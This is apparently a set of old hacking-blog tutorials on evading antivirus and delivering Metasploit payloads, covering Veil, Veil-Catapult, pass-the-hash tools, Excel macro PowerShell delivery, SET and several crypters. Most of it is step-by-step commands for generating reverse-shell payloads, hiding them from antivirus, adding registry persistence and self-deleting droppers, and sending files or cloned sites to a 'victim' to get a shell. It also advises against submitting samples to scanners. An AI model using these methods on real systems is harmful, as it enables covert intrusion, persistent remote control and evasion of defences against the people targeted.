How to install and use Veil-Catapult in backtrack?

Today we are gonna talk about Veil-Catapult.Veil-Catapult is payload delivery for when metasploit’s psexec getting caught by AV.It utilizes Veil-Evasion to generate AV-evading binaries, impacket to upload/host the binaries, and the passing-the-hash toolkit to trigger execution.It officially supported on kali linux only.I`m going to show you how to install Veil-Catapult in backtrack?

First if you have not already installed veil-evasion framework then first install it as mentioned here.After installing Veil-evasion follow steps.

root@bt:~wget https://github.com/Veil-Framework/Veil-Catapult/archive/master.zip

root@bt:~unzip master.zip 

root@bt:~cd Veil-Catapult-master/

root@bt:~sh setup.sh

Now veil-catapult require impacket library & passing the hash toolkit.So setup script try to install PTH suite but we got error.So we have to manually do it.

Install passing the hash.

root@bt:~wget https://passing-the-hash.googlecode.com/files/wmiPTH-1.0-1.deb

root@bt:~wget https://passing-the-hash.googlecode.com/files/winexePTH1.1.0-1.deb

root@bt:~dpkg -i winexePTH1.1.0-1.deb

root@bt:~dpkg -i wmiPTH-1.0-1.deb

If you are using other OS then you have to manually build it as mentioned here .

It installed into the /opt/pth/bin folder , we have to move it into /usr/bin.

root@bt:~# ln -s /opt/pth/bin/wmis /usr/bin/pth-wmis

root@bt:~# ln -s /opt/pth/bin/winexe /usr/bin/pth-winexe

root@bt:~# ln -s /opt/pth/bin/wmic /usr/bin/pth-wmic

Installing impacket library

root@bt:~# wget http://corelabs.coresecurity.com/index.php?module=Wiki&action=attachment&type=tool&page=Impacket&file=impacket-0.9.11.tar.gz

root@bt:~# tar -xvzf impacket-0.9.11.tar.gz 

root@bt:~# cd impacket

root@bt:~# python setup.py build 

I know you have question that we can install it , but when we tried to install , it  installed succesfully ;but some of modules are missing.So we first gonna build it then copy it. Now copy folder impacket from build/lib.linux-i686-2.6/ and paste it into /usr/lib/pymodules/python2.6 

Now everything is ready ,we can run it. Before that open /etc/veil/settings.py and checkout all path.

root@bt:~/Veil-Catapult-master# python Veil-Catapult.py 

Now select number according to your choice & fill out necessary option.

Powershell injector

Barebones python injector

Sethc backdoor

Reboot, hit Shift key 5 times, SYSTEM shell will pop up. Also there is script for it in metasploit.Check it out this awesome blog for more details.

EXE delivery upload 

Cleanup resource script is generated , you can use it after your work completed for kill process & remove exe.

You can also host exe using temporary SMB server.This will load the payload executable into memory without touching disk, allowing otherwise disk-detectable executable to bypass detection

Alternatives of Veil-Catapult are smbexec  and keimpx.

Deliver powershell payload using macro.

In past we saw method of direct shell code execution in Ms word or Excel using macro;but if document is closed then we will lose our shell so we have to migrate to other process and sometimes migration is pick up by AV. So in this tutorial we are going to use powershell payload.

Advantages of this method:-

(1)Persistence
(2)Migration is not needed
(3)AV bypass

(1)First we will generate powershell payload; for this purpose i used SET.You can also used Veil or powersploit.Open SET in terminal & select Social-Engineering Attacks and then Powershell Attack Vectors.Generate Powershell Alphanumeric Shellcode Injector.Fill LHOST & LPORT value.

Our generated powershell payload is located into /root/.set/reports/powershell/. Rename x86_powershell_injection.txt to x32.ps1.

(2)Now Clone git repository of code

root@bt:~# git clone https://github.com/enigma0x3/Old-Powershell-payload-Excel-Delivery

root@bt:~# cd Powershell-payload-Excel-Delivery/

(3)In Powershell-payload-Excel-Delivery folder; rename RemovePayload.bat to remove.bat. Now you have to host remove.bat and x32.ps1 to web-server.Then open persist.vbs file and change URL of x32.ps1 in line 13,33 to your hosted x32.ps1 `s URL. And now also host persist.vbs to web-server. I used localhost.

(4)Open Macrocode file from cloned folder & change URL in line 27,82,118 respectively to your hosted x32.ps1,persist.vbs and remove.bat `s URL.Now add this macro code into excel document as mentioned in previous tutorial.

(5)And last step is setup listener.

Now send this document to victim , as soon as he open document and run macro we will get shell. Once the payload is ran, it runs in the powershell process, so if the user closes excel, you keep your shell. You also remain in a stable process until reboot, so migration is not needed.

It then pulls down a persistence script, drops it, creates a registry key for autorun for the persistence script. Once done, it also drops a self-deleting bat file that removes the initial payload from the system.

Thanks to  enigma0x3 for this awesome method.

Update :- New-Powershell-Payload-Excel-Delivery

This is a VBA macro that uses Matt Graeber's Invoke-Shellcode to execute a powershell payload in memory as well as schedule a task for persistence(20 min onidle  you get shell).

root@bt:~# git clone https://github.com/enigma0x3/Powershell-Payload-Excel-Delivery.git
root@bt:~# cd Powershell-Payload-Excel-Delivery/

Open MacroCode file & change Download URL for Invoke-Shellcode file & change LHOST & LPORT option. Now add macro-code in Excel file & start-up listener.

How to solve compile error in veil?

As you know, veil is AV evasion framework for metasploit payload. On the 15th of every month, for the next year, at least one new payload module will be released.Yesterday they released two new payload.

1. pure windows/meterpreter/reverse_tcp stager, no shellcode
2. pure windows/meterpreter/reverse_tcp windows service stager compatible with psexec, no shellcode

Compiler Error in c payloads:-

 Available c payloads:

    VirtualAlloc                         Poor
    VoidPointer                         Poor
    meter_rev_tcp                     Excellent
    meter_rev_tcp_service        Excellent

I used c/meter_rev_tcp. After setting of LHOST & LPORT ; when i try to generate it ; i got error.

sh: i686-w64-mingw32-gcc: command not found

Okay now we successfully generated payload file, but we get compiler error while compiling into cross-platform exe.

Error clearly suggest that i686-w64-mingw32-gcc is not installed.The mingw-w64 project is a complete run-time environment for gcc to support binaries native to Windows 64-bit and 32-bit operating systems.In short, to compile the payload for 64 bit windows ; we have to install mingw-w64. 

In case of 32 bit windows os , we can compile it,because when you setup veil environment mingw32 installed using wine.

Compile payload for 32 bit:-

root@bt:~# cd .wine/drive_c/MinGW/bin/

root@bt:~/.wine/drive_c/MinGW/bin# wine mingw32-gcc.exe /root/veil-output/source/output.c -lwsock32  -o output.exe

So our payload is compiled into exe for 32 bit windows.

Compile payload for 64 bit:-

For this purpose you have to install mingw32-w64.

Download from here & build it.If you don`t want to install it; then you can use pre-compiled version.

root@bt:/media/tools/mingw-w64-bin_i686-linux_20111031_sezero/cross_win64/bin# ./x86_64-w64-mingw32-gcc /root/veil-output/source/output.c -lwsock32 -o output.exe

I don`t test compiled exe  in 64 bit, so if anyone use it, please let me know exe is working or not.

If you want to build MinGW-w64 for Win32 and Win64 using automated bash script, click here.

Compiler error in C#:-

Available c# payloads:

    VirtualAlloc                   Poor
    b64SubVirtualAlloc       Normal

root@bt:~/Downloads/Veil-master# ./Veil.py -l c# -p b64SubVirtualAlloc --msfpayload windows/meterpreter/reverse_tcp -o payload --msfoptions LHOST=192.168.56.101 LPORT=443

Our source file has been generated and got following error.
error CS2007: Unrecognized command-line option: `-platform:x86'

gmcs /root/veil-output/source/payload.cs 

Now our exe is generated,it`s in same source folder.

List of Differnet AV evasion Frameworks.

Today we are gonna talk about different AV evasion frameworks for metasploit payload & how to use them? It`s very imporatant when you know which AV you have to bypass, because we don`t have to worry about FUD. Some payload can bypass specific AV ; while other AV can not be bypassed using that payload.

(1)Veil:-

Veil is python based tool which create FUD payload , One of the best framework for AV evasion. On the 15th of every month, at least one new payload module will be released.

Click here for how to install & use Veil?

(2)AV0id :-

Anti-Virus Bypass Metasploit Payload Generator Script.

wget https://github.com/nccgroup/metasploitavevasion/archive/master.zip
unzip master.zip
cd metasploitavevasion-master/
./avoid.sh

If you are using other interface than eth , then you have to change in script avoid.sh . For exmaple ; i am using ppp0 interface ,so open avoid.sh file & replace line 150 which is IP=$(ifconfig "$IPINT" |grep "inet adr:" |cut -d ":" -f 2 |awk '{ print $1 }') with IP=$(ifconfig ppp0 | awk '/inet addr/ {split ($2,A,":"); print A[2]}').

Click here for original author`s blog.

(3)Syringe:-

wget https://syringe-antivirus-bypass.googlecode.com/files/syringe%200.1.tar
tar xf syringe\ 0.1.tar
./syringe.sh

As mention previously , change interface type in script if you are not using eth. Replace line 10 which is export interface=eth0 to export interface=ppp0.

 

(4)Shellcodeexec:-

git clone https://github.com/inquisb/shellcodeexec

we are gonna use downloaded shellcodexec in third step on victim machine.

(1)msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.56.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX

(2)msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.56.1 E

(3)C:\WINDOWS\Temp>shellcodeexec.exe <msfencode's alphanumeric-encoded payload>

Click here for detail tutorial on  how to use shellcodeexec?

(5)Hypersion:-

Hyperion is a runtime encrypter for 32-bit portable executables.

wget http://nullsecurity.net/tools/binary/Hyperion-1.0.zip
unzip Hyperion-1.0.zip
cd Hyperion-1.0
wine /root/.wine/drive_c/MinGW/bin/g++.exe ./Src/Crypter/*.cpp -o crypter.exe

Now generate metasploit payload.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.128 LPORT=443 -f exe >payload.exe
wine crypter.exe payload.exe encrypted_payload.exe

 

(6)Crypter.py:-

Download it from below link .
http://home.base.be/%72%68%69%6e%63%6b%78%74/script.zip
unzip  script.zip
python crypter.py

If you get error while running then change path of structure.c in line 45 & save it , run again.

(7)Brute-force AV Evasion :-

Genpayloads.py is script to generate lots of payloads , then scan folder for specific after that you have some binary left in folder which does not detected by specific AV.

Click here for Original tutorial

wget https://raw.github.com/obscuresec/random/master/GenPayloads.py
python GenPayloads.py windows/meterpreter/reverse_tcp 192.168.1.2 443 1000 yes

(8)Finding Simple AV Signatures with PowerShell :-

Awesome tutorial here to find AV signatures & then change specific bit which trigger AV . It only works with signature-based antivirus .

(9)Powershell:-

Bypass AV using SET powershell module using Batch file

Get shell using powersploit

Deliver powershell payload using macro

(10)Get Shell Using VB script:-

Metasploit has a couple of built in methods you can use to infect Word and Excel documents with malicious Metasploit payloads. You can also use your own custom payloads as well.

For details tutorial click here

(11)Ghost Writing ASM :-

Using Metasm To Avoid Antivirus Detection. First generate metasploit payload in raw format then disassmble using metasm which come with metasploit.Add anything you want so long as you don’t break the functionality of the application.After that compile into EXE.

For tutorial click here .

(12)Different Pivoting technique to bypass AV :-

Following are framework & module which are mostly used after getting credentials. It does not flag by AV like traditional psexec.

(1)Veil-Catapult

(2)SMBExec

(3)Keimpx

(4)PTH suite

(5)Metasploit module:- powershell_psexec , psexec_psh , psexec_command

If you know other methods for AV evasion then please comment here.

Bypass AV using powershell method using batch file.

In penetration testing first step is how we can bypass AV & make our payload FUD. Previously we saw that we can bypass AV using Veil.At that time we used python module.In veil there are four types of payload.C,C#,powershell and python. Today we use powershell module.

If you don`t aware about powershell ; then you can google it.It`s windows based scripting language like bash in linux.Most of AV cannot detect it.We use SET powershell module to bypass AV; you can also use veil module.

cd  /pentest/exploits/set/
./setoolkit

type 1 which is social engineering attack
After that type 10.

Then give your i.p. & port to connect reverse shell.

Now in figure you can see that it has been generated & stored in to /root/.set/reports/powershell . And we also start metasploit listener.If victim paste our generated payload in cmd then we can get meterpreter shell. But i think it`s hard to tell someone to copy something & paste into cmd. So we will create batch file of our payload.

Create Batch file of our Payload.

(1)open x86_powershell_injection.txt file from  /root/.set/reports/powershell.
(2)Add path of powershell in first line. For example your code is starting from powershell word just put C:\\windows/system32/windowspowershell/v1.0/ before it.
(3)If you want to hide text during execution put @echo off at start of script.
(4)copy all code from x86_powershell_injection.txt
(5)Create new file & paste code
(6)Save this file as .bat extension and send to victim

As soon as he open file we can get shell.

Bypass AV using Veil In Backtrack.

Today this blog complete exactly one year.Before one year i started journey in security world & still now it`s going well.Ok get to the point.Most of time it happened that our payload is detected by AV ;we can use encoder to encode our payload ;So it can not be detected by AV. Today we show how we can bypass AV using Veil. Veil is python based tool which create FUD payload.

How to Download & use ?

wget https://github.com/ChrisTruncer/Veil/archive/master.zip
unzip master.zip
cd Veil-master/setup
chmod +x setup.sh
./setup.sh

It will download all required python package for generating payload.

Veil is officially supported in Kali linux ; But it`s python based tool so we can use it in any os which is able to execute python script. I used it in Backtrack 5.We have to make some change in generated veil.py file to get working in backtrack.
Open directory of veil & go to config and open veil.py.(In latest version of veil , open /etc/veil/settings.py) If you installed metasploit from binary package then Change  line of metasploit path to /opt/metasploit/apps/pro/msf3/ and save it.

Go to veil direcory & run
./Veil.py

   

Now type list & you can see available payload.

Select payload.

type generate.

After that payload has been generated & you have to start metasploit listner for that payload type following in terminal.

msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.56.101 LPORT=444 E

Now send file to victim. As soon as he open file you get admin access without triggering AV alert.Look at my AV update status.

 As you can see in bottom of panel that AV is activate & it`s updated  ; still we can bypass AV & get meterpreter seesion.

 [!] And don't submit samples to any online scanner! ;)
It`s author request.

Bypass Antivirus using S.E.T

Bypass Antivirus using multyply injector shell code using SET & Metasploit.

Requirement:-

Victim`s O.S.- windows.

Attacker:- S.E.T ,Metasploit.

(1)Open terminal & type following command

sudo bash

cd /opt/set

./set

(2)Now select option 1 social engineering attack

(3)Select option 2 website attack vector

(4)Now we will choose the option 1 the Java Applet Attack Method

(5)Now we will choose option 2, “Site Cloner”

(6)Enter the URL to clone: http://www.google.com (but you can use any website to run the Java Applet)

(7)Now choose 16 “Multi PyInjector Shellcode Injection”,

(8)Port of the attacker computer. In this example I use port 443

(9)Select the payload you want to deliver via shellcodeexec press enter here

(10)Now again select Port of the attacker computer. In this example I use port 444 and 445

(11)Select the payload you want to deliver via shellcodeexec press enter here

(12)send your I.p. To victim. As soon as he open link & run java applet you have access of victim `s pc

(13)sessions -l

(14)sessions -i I.d